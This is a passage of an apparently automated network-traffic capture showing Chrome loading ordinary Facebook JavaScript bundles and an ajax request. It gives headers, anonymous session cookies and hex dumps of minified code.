                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: i4+km8DYuZQz015P5cIc5L7Lyhond4adEmSVXhj0LDSVEis7uX/sax/AThxEtZIVf6Rbqvee9x1L5z6vir+dVA==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:24 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 18154
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 2f 2a 2a 0a 20 2a 20 4c 69 63 65 6e 73 65 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 2f 74 33 68 4f 4c 73 38 77 6c 58 79 2f 0a 20 2a 2f 0a 5f 5f 64 28 22 6a 61 76 61 73 63 72 69 70 74 2d 62 6c 6f 77 66 69 73 68 2d 31 2e 30 2e 35 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 62 3d 7b 7d 3b 76 61 72 20 67 3d 7b 65 78 70 6f 72 74 73 3a 62 7d 3b 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 76 61 72 20 61 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 74 68 69 73 2e 6b 65 79 3d 62 2c 28 63 3d 3d 3d 22 65 63 62 22 7c 7c 63 3d 3d 3d 22 63 62 63 22 29 26 26 28 74 68
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*//** * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ */__d("javascript-blowfish-1.0.5",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){var a=function(b,c){this.key=b,(c==="ecb"||c==="cbc")&&(th
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1769INData Raw: 37 34 2c 31 35 33 39 32 34 31 39 34 39 2c 34 35 38 37 38 38 31 36 30 2c 33 34 33 36 33 31 35 30 30 37 2c 31 38 30 37 30 31 36 38 39 31 2c 33 37 31 38 34 30 38 38 33 30 2c 39 37 38 39 37 36 35 38 31 2c 31 30 34 33 36 36 33 34 32 38 2c 33 31 36 35 39 36 35 37 38 31 2c 31 39 32 37 39 39 30 39 35 32 2c 34 32 30 30 38 39 31 35 37 39 2c 32 33 37 32 32 37 36 39 31 30 2c 33 32 30 38 34 30 38 39 30 33 2c 33 35 33 33 34 33 31 39 30 37 2c 31 34 31 32 33 39 30 33 30 32 2c 32 39 33 31 39 38 30 30 35 39 2c 34 31 33 32 33 33 32 34 30 30 2c 31 39 34 37 30 37 38 30 32 39 2c 33 38 38 31 35 30 35 36 32 33 2c 34 31 36 38 32 32 36 34 31 37 2c 32 39 34 31 34 38 34 33 38 31 2c 31 30 37 37 39 38 38 31 30 34 2c 31 33 32 30 34 37 37 33 38 38 2c 38 38 36 31 39 35 38 31 38 2c 31 38
                                                                                                                                                                                                                                  Data Ascii: 74,1539241949,458788160,3436315007,1807016891,3718408830,978976581,1043663428,3165965781,1927990952,4200891579,2372276910,3208408903,3533431907,1412390302,2931980059,4132332400,1947078029,3881505623,4168226417,2941484381,1077988104,1320477388,886195818,18


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  83192.168.2.649810157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:23 UTC385OUTGET /rsrc.php/v3ioXj4/y9/l/ru_RU/UlpshyJeqkw.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1930INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: sM5EmPOSTNCaG7HHvhTjEQ==
                                                                                                                                                                                                                                  Expires: Tue, 23 Sep 2025 07:44:46 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: 07pK/vQLomHsy2Xpwq0Gnc+d4R4YYqiHaBgFPOZ6rPz2i4g1rBVHqvNA/SKlCwTTnr9cCSZCgWCCSNThxof1pg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:24 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3411, tp=-1, tpl=-1, uplat=5, ullat=-1
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 49381
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1INData Raw: 3b
                                                                                                                                                                                                                                  Data Ascii: ;
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC15862INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 72 74 69 6c 6c 65 72 79 53 65 67 6d 65 6e 74 22 2c 5b 22 69 6e 76 61 72 69 61 6e 74 22 2c 22 63 72 3a 39 39 38 35 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 29 7b 76 61 72 20 69 3d 30 3b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 7c 7c 68 28 30 2c 31 34 39 36 29 2c 22 63 61 74 65 67 6f 72 79 22 69 6e 20 61 26 26 22 64 65 73 63 72 69 70 74 69 6f 6e 22 69 6e 20 61 7c 7c 68 28 30 2c 33 31 33 38 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 61 29 29 2c 74 68 69 73 2e 24 31 3d 21 31 2c 74 68 69 73 2e 24 32 3d 62 61 62 65 6c 48 65 6c 70 65 72 73 5b 22 65 78 74 65 6e 64 73 22 5d 28 7b 7d 2c 61 2c 7b 69 64 3a
                                                                                                                                                                                                                                  Data Ascii: /*FB_PKG_DELIM*/__d("ArtillerySegment",["invariant","cr:9985"],(function(a,b,c,d,e,f,g,h){var i=0;a=function(){function a(a){a||h(0,1496),"category"in a&&"description"in a||h(0,3138,JSON.stringify(a)),this.$1=!1,this.$2=babelHelpers["extends"]({},a,{id:
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC16384INData Raw: 34 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 33 61 5c 75 30 34 34 36 5c 75 30 34 33 38 5c 75 30 34 34 65 20 49 6e 73 74 61 67 72 61 6d 20 5c 75 30 34 33 38 5c 75 30 34 33 62 5c 75 30 34 33 38 20 5c 75 30 34 33 32 5c 75 30 34 33 37 5c 75 30 34 33 62 5c 75 30 34 33 65 5c 75 30 34 33 63 5c 75 30 34 33 30 5c 75 30 34 34 32 5c 75 30 34 34 63 20 5c 75 30 34 34 37 5c 75 30 34 33 35 5c 75 30 34 33 39 2d 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 30 5c 75 30 34 33 61 5c 75 30 34 33 61 5c 75 30 34 33 30 5c 75 30 34 34 33 5c 75 30 34 33 64 5c 75 30 34 34 32 2c 20 5c 75 30 34 34 64 5c 75 30 34 34 32 5c 75 30 34 33 65 20 5c 75 30 34 33 63 5c 75 30 34 33 65 5c 75 30 34 34 38 5c 75 30 34 33 35 5c 75 30 34 33 64 5c 75 30 34 33 64 5c 75 30 34 33 38 5c 75
                                                                                                                                                                                                                                  Data Ascii: 4\u0443\u043d\u043a\u0446\u0438\u044e Instagram \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c \u0447\u0435\u0439-\u0442\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442, \u044d\u0442\u043e \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC16384INData Raw: 28 61 2e 70 6f 6c 69 63 79 2e 73 3d 3d 3d 31 29 7b 61 2e 74 61 67 73 3d 64 28 22 46 61 6c 63 6f 55 74 69 6c 73 22 29 2e 78 6f 72 42 69 74 6d 61 70 28 28 62 3d 61 2e 74 61 67 73 29 21 3d 6e 75 6c 6c 3f 62 3a 5b 30 2c 30 5d 2c 77 29 3b 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 24 28 61 29 7b 69 66 28 61 3d 3d 3d 22 22 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 69 66 28 74 2e 68 61 73 28 61 29 29 72 65 74 75 72 6e 20 74 2e 67 65 74 28 61 29 3b 65 6c 73 65 7b 76 61 72 20 62 3d 7b 63 6c 61 69 6d 3a 22 22 7d 2c 63 3d 61 2e 73 70 6c 69 74 28 22 5e 23 22 29 3b 69 66 28 63 2e 6c 65 6e 67 74 68 3e 3d 34 29 7b 76 61 72 20 64 3d 63 5b 30 5d 2c 65 3d 63 5b 31 5d 2c 66 3d 63 5b 32 5d 3b 63 3d 63 5b 33 5d 3b 66 21 3d 3d 22 22 3f 62 3d
                                                                                                                                                                                                                                  Data Ascii: (a.policy.s===1){a.tags=d("FalcoUtils").xorBitmap((b=a.tags)!=null?b:[0,0],w);return!0}return!1}function $(a){if(a==="")return null;if(t.has(a))return t.get(a);else{var b={claim:""},c=a.split("^#");if(c.length>=4){var d=c[0],e=c[1],f=c[2];c=c[3];f!==""?b=
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC750INData Raw: 73 65 6e 64 28 29 7d 3b 69 66 28 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 69 73 4f 6e 6c 69 6e 65 28 29 29 6b 28 29 3b 65 6c 73 65 7b 66 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 61 2e 6f 6e 6c 69 6e 65 3b 61 26 26 28 6b 28 29 2c 67 2e 72 65 6d 6f 76 65 28 29 29 7d 3b 67 3d 63 28 22 4e 65 74 77 6f 72 6b 53 74 61 74 75 73 22 29 2e 6f 6e 43 68 61 6e 67 65 28 66 29 7d 7d 7d 2c 63 6c 65 61 6e 4f 6e 4c 6f 67 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 64 28 22 57 65 62 53 74 6f 72 61 67 65 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 22 29 2e 73 65 74 4c 61 73 74 43 6c 65 61 6e 75 70 52 65 61 73 6f 6e 28 62 29 3b 63 28 22 43 61 63 68 65 53 74 6f 72 61 67 65 22 29 2e 64 69 73 61 62 6c 65 50 65 72 73 69 73 74 65 6e 74 57 72 69 74 65 73 28
                                                                                                                                                                                                                                  Data Ascii: send()};if(c("NetworkStatus").isOnline())k();else{f=function(a){a=a.online;a&&(k(),g.remove())};g=c("NetworkStatus").onChange(f)}}},cleanOnLogout:function(a,b){d("WebStorageCleanupReason").setLastCleanupReason(b);c("CacheStorage").disablePersistentWrites(


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  84192.168.2.649811157.240.0.354431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC874OUTGET /ajax/bz?__a=1&__ccg=GOOD&__dyn=7xe6E5aQ1PyUbFp41twpUnwgU29zE6u7E3rw5ux60Vo1upE4W0OE2WxO0FE2awt81s8hwnU1e42C1Fwc60D830wbu0RE2Jw8Xwn83fw5rwSyE1582ZwrU1w86O1FwgU1do7u1rw&__hs=19995.BP%3ADEFAULT.2.0..0.0&__hsi=7419923633127123911&__req=1&__rev=1016900551&__s=8mcer0%3Aeat7lj%3A1dha06&__spin_b=trunk&__spin_r=1016900551&__spin_t=1727585595&__user=0&dpr=1&jazoest=2941&locale=ru_RU&lsd=AVrc04HtcqM HTTP/1.1
                                                                                                                                                                                                                                  Host: www.facebook.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; _js_datr=O934ZvtQ_C-R3ZM0Ae39F-hF; wd=1280x907
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC952INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown&brsid=7419923670946067025", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown&brsid=7419923670946067025"}]}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1859INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 20 63 6f 6e 6e 65 63 74 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 27
                                                                                                                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* 'unsafe-inline' blob: data: 'self' connect.facebook.net '
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1810INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 73 65 6c 66 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 62 72 6f 77 73 69 6e 67 2d 74 6f 70 69 63 73 3d 28 73 65 6c 66 29 2c 20 63 61 6d 65 72 61 3d 28 73 65 6c 66 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63
                                                                                                                                                                                                                                  Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(self), autoplay=(), bluetooth=(), browsing-topics=(self), camera=(self), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), c


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  85192.168.2.649812157.240.0.64431060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC385OUTGET /rsrc.php/v3iKIu4/yy/l/ru_RU/lW1EzoN7_Oc.js HTTP/1.1
                                                                                                                                                                                                                                  Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1932INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                  content-md5: xDxvLqQnuVOQBwOPhCii3w==
                                                                                                                                                                                                                                  Expires: Mon, 29 Sep 2025 04:53:24 GMT
                                                                                                                                                                                                                                  Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                  report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                  timing-allow-origin: *
                                                                                                                                                                                                                                  document-policy: force-load-at-top
                                                                                                                                                                                                                                  permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                  cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                  origin-agent-cluster: ?1
                                                                                                                                                                                                                                  X-FB-Debug: DiHqjnlB3qzz7UQu4G0wSk05SvoJw8Noc8SwkgPErOOsw5NA/8YZUPoZJ8itxLpgPekWyrdrIL0vABXxdgqDxg==
                                                                                                                                                                                                                                  Date: Sun, 29 Sep 2024 04:53:24 GMT
                                                                                                                                                                                                                                  X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=122, ullat=0
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 102543
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1500INData Raw: 3b 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 42 61 73 65 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 41 76 61 69 6c 61 62 6c 65 48 65 69 67 68 74 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3b 61 3d 68 7c 7c 64 28 22 72 65 61 63 74 22 29 3b 62 3d 61 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 6e 75 6c 6c 29 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 42 61 73 65 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 43 6f 6e 74 65 78 74 53 69 7a 65 43 6f 6e 74 65 78 74 22 2c 5b 22 72 65 61 63 74 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c
                                                                                                                                                                                                                                  Data Ascii: ;/*FB_PKG_DELIM*/__d("BaseContextualLayerAvailableHeightContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=a.createContext(null);g["default"]=b}),98);__d("BaseContextualLayerContextSizeContext",["react"],(function(a,b,c,d,
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1500INData Raw: 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 61 3d 22 6c 61 79 6f 75 74 41 6e 69 6d 61 74 69 6f 6e 22 3b 63 3d 62 28 22 24 49 6e 74 65 72 6e 61 6c 45 6e 75 6d 22 29 2e 4d 69 72 72 6f 72 65 64 28 5b 22 53 74 61 72 74 22 2c 22 53 74 6f 70 22 5d 29 3b 66 2e 4c 41 59 4f 55 54 5f 41 4e 49 4d 41 54 49 4f 4e 5f 45 56 45 4e 54 3d 61 3b 66 2e 4c 61 79 6f 75 74 41 6e 69 6d 61 74 69 6f 6e 45 76 65 6e 74 54 79 70 65 3d 63 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 63 61 6c 63 75 6c 61 74 65 42 61 73 65 43 6f 6e 74 65 78 74 75 61 6c 4c 61 79 65 72 50 6f 73 69 74 69 6f 6e 22 2c 5b 22 4c 6f 63 61 6c 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 64 28 22 4c 6f 63 61 6c 65
                                                                                                                                                                                                                                  Data Ascii: ,f){"use strict";a="layoutAnimation";c=b("$InternalEnum").Mirrored(["Start","Stop"]);f.LAYOUT_ANIMATION_EVENT=a;f.LayoutAnimationEventType=c}),66);__d("calculateBaseContextualLayerPosition",["Locale"],(function(a,b,c,d,e,f,g){"use strict";var h=d("Locale
                                                                                                                                                                                                                                  2024-09-29 04:53:24 UTC1500INData Raw: 6c 65 66 74 3f 66 3d 61 2e 6c 65 66 74 2d 6d 3a 6d 2b 64 2e 77 69 64 74 68 3e 61 2e 72 69 67 68 74 26 26 28 66 3d 61 2e 72 69 67 68 74 2d 6d 2d 64 2e 77 69 64 74 68 29 29 3b 69 2b 3d 66 7d 71 3d 22 22 3b 28 69 21 3d 3d 30 7c 7c 6a 21 3d 3d 30 29 26 26 28 71 2b 3d 22 74 72 61 6e 73 6c 61 74 65 28 22 2b 4d 61 74 68 2e 72 6f 75 6e 64 28 69 29 2b 22 70 78 2c 20 22 2b 4d 61 74 68 2e 72 6f 75 6e 64 28 6a 29 2b 22 70 78 29 20 22 29 3b 28 6b 21 3d 3d 30 7c 7c 6c 21 3d 3d 30 29 26 26 28 71 2b 3d 22 74 72 61 6e 73 6c 61 74 65 28 22 2b 6b 2b 22 2c 20 22 2b 6c 2b 22 29 20 22 29 3b 65 2e 74 72 61 6e 73 66 6f 72 6d 3d 71 3b 72 65 74 75 72 6e 7b 61 64 6a 75 73 74 6d 65 6e 74 3a 66 2c 73 74 79 6c 65 3a 65 7d 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29
                                                                                                                                                                                                                                  Data Ascii: left?f=a.left-m:m+d.width>a.right&&(f=a.right-m-d.width));i+=f}q="";(i!==0||j!==0)&&(q+="translate("+Math.round(i)+"px, "+Math.round(j)+"px) ");(k!==0||l!==0)&&(q+="translate("+k+", "+l+") ");e.transform=q;return{adjustment:f,style:e}}g["default"]=a}),98)
